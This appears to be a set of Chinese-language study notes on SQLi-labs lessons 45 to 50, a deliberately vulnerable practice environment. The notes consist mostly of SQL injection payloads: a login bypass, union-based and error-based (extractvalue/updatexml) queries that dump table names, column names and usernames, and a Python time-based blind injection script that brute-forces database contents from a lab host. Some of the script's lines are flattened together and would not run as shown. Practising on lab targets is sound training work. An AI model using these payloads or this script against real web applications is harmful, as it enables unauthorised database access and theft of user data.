45.
不会显示报错信息通过or 1验证
在密码处输入')or('1
登录成功
')union select 1,2,3 #
')union select 1,database(),3 #
')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #
')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #
')union select 1,(select group_concat(username) from security.users),3 #
46.
单双引号都报错’
后面是order by使用and 1=1 是验证不了的
1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))
47.
1'失败
1‘ --+成功
1“成功
1'and(extractvalue(1,concat(0x5c,database()))) --+
1'and(updatexml(1,concat(0x7e,database(),0x7e),1)) --+
1'and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)) --+
1'and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)) --+
48.
发现页面无报错回显,这里还是order by 无法使用union
使用延时注入
1 and if(substr(database(),1,1)='s',sleep(2),0)
用脚本进行爆破
import requests,timedef database():database_name = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:database_name += charprint(f"数据库名称为:{database_name}")breakelse:breakreturn database_namedatas = database()
print("最终数据库名称为:",datas)
1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='e',sleep(2),0) --+
def tablename():table_name =''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:table_name += charprint(f"表名称为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print("最终表名称为:",tables)
1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='i',sleep(2),0) --+
def columnname():column_name = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:column_name += charprint(f"列名称为:{column_name}")breakelse:breakreturn column_namecolumns = columnname()
print("最终列名称为:",columns)
1 and if(substr((select username from security.users limit 1,1),1,1)='a',sleep(2),0) --+
def datas():data = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url) end_time = time.time() rsp.time = end_time - start_time if rsp.time >= 2:data += charprint(f"数据为:{data}")breakelse:breakreturn data
das = datas()
print("最终数据为:",das)
完整的脚本
import requests,timedef database():database_name = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:database_name += charprint(f"数据库名称为:{database_name}")breakelse:breakreturn database_namedatas = database()
print("最终数据库名称为:",datas)def tablename():table_name =''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:table_name += charprint(f"表名称为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print("最终表名称为:",tables)def columnname():column_name = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:column_name += charprint(f"列名称为:{column_name}")breakelse:breakreturn column_namecolumns = columnname()
print("最终列名称为:",columns)def datas():data = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url) end_time = time.time() rsp.time = end_time - start_time if rsp.time >= 2:data += charprint(f"数据为:{data}")breakelse:breakreturn data
das = datas()
print("最终数据为:",das)
49.
和上面比多了’
50.
1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))
1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))